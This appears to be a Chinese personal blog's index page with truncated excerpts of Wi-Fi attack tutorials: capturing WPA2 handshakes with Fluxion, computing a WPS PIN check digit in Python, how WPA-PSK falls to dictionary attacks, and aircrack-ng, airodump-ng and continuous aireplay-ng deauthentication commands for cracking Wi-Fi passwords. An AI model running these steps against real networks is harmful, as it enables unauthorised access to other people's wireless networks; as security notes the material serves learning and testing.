Myluzh Blog

Strive to become a dream architect.

Kali环境下使用Fluxion抓WPA2握手包

2023-5-13 myluzh SECURE

0x01 前言 一直记不起来有个抓wpa2握手包的集成工具叫啥,比Aircrack好用,想了很久终于想起来了,叫fluxion。所以做一下笔记免得下次忘记了。 但是Aircrack是kali自带的,fluxion需要自己装一下,不过安装过程也是比较简单。 项目地址:https://github.com/FluxionNetwork/fluxion 0x02 Fluxion安装 1.使用git clone命令或者自行下载fluxion包到kali下面 git clone https://www.github.com/FluxionNetwork/fluxion.git 2.进入fluxion目录 cd fluxion 3.安装fluxion 注意:首次可能需要./fuluxion.sh -i进行安装,这边推荐先把kali源改到国内这样安装包快一些。 ./fluxion.sh -i 4.检查网线网卡与kali机是否进行连接,使用命令iwconfig 0x03 fluxion抓握手包 1.检查 1.运行fluxion ./fluxion.sh 2.选择一个攻击方式,选[2],回车。 [2]Handshake Snoo...

阅读全文>>

标签: kali wifi wpa2 无线网络 握手包 fluxion

评论(0) (427)

WPS PIN码最后一位校验位计算

2021-8-9 myluzh SECURE

""" PIN码结构: 前四位 中间三位 校验位 x x x x x x x x 单 双 单 双 单 双 单 PIN码最后一位校验算法: 单位:-x*3 双位:10-x 算:双位+ 单位- 最后运算结果取余的绝对值 """ pin = '7697000' # pin前七位 pinLast = abs((-(3 * int(pin[0])) + (10 - int(pin[1])) - (3 * int(pin[2])) + (10 - int(pin[3])) - (3 * int(pin[4])) + ( 10 - int(pin[5])) - (3 * int(pin[6]))) % 10) print(pinLast) # 校验位 print(pin+str(pinLast))

阅读全文>>

标签: 无线网络 wps pin

评论(0) (658)

WPA-PSK安全漏洞原理

2021-7-24 myluzh SECURE

WPA/WPA2简介 由于WEP中存在严重的安全漏洞,WIFI联盟制定了WPA和WPA2以取代WEP。其中WPA实现了802.11i的主要部分,提供了对现有硬件的向下兼容,被用来作为WEP到802.11i的过渡。之后的则WPA2完整的实现了整个IEEE 802.1i标准。 WPA的根据应用场景的不同采用不同的认证方式,其中面对家庭或小型办公场所网络的WPA-PSK不需要专门的认证服务器,所有该网络中的设备通过使用同一个256-bit的密钥来进行认证。 WPA-PSK安全漏洞 WPA-PSK认证中的四次握手被设计用来在不安全的信道中,通过明文传输的方式来进行一定程度上的认证,并且在设备之间建立安全信道。首先,PSK会被转化为PMK,而PMK则在接下来被用于生成PTK。PTK则会被分为若干部分,其中一部分被称作MIC Key,用来生成每一个包的Hash值来用于验证。 WPA的安全问题与其认证过程所使用的算法关系不大,更多的是由于这一过程可以被轻易的重现,这就使得WPA-PSK可能遭受字典暴力攻击。 WPA-PSK攻击原理 WPA-PSK攻击分为以下几个步骤: 1. 根据passphrase,SSID生成P...

阅读全文>>

标签: 无线网络 wpa

评论(0) (551)

MacBook利用自带airport抓包cap包,并使用aircrack-ng暴破wifi密码

2021-7-24 myluzh macOS

1.安装homebrew /bin/zsh -c "$(curl -fsSL https://gitee.com/cunkai/HomebrewCN/raw/master/Homebrew.sh)" 2.安装aircrack-ng brew install aircrack-ng 3.查看网卡设备名字 系统偏好设置->网络->Wi-Fi->高级->硬件->MAC地址 ifconfig 查找该MAC地址对应的网卡设备名 这边可以看到MAC地址对应的是en0 4.获取所有wifi信息 sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s 输出的就是附近所有的wifi, SSID为wifi名称, BSSID为wifi网卡MAC地址, CHANNEL为信道。 如果觉得上面命令太长,可以给airport设置一个软链接: 首先需解除rootless内核保护(内核保护会对\usr、\sbin禁止root权限,下面操作需用到\us...

阅读全文>>

标签: 无线网络 aieport aircrack-ng

评论(0) (1678)

Kali Linux 破解wifi密码

2021-2-14 myluzh SECURE

0x01 扫描wifi airmon-ng start wlan0开启网卡监听模式 iwconfig命令查看网卡信息, 查看网卡名称有没有变,有些是wlan0有些是wlan0mon airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务 BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码 0x02 抓数据包 接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon 如:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/wifi wlan0mon 数据包已经正在抓取 如果抓取不到数据,新建一个终端:键入aireplay-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon) 如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:...

阅读全文>>

标签: kali linux wifi 破解 wpa2 无线网络

评论(0) (840)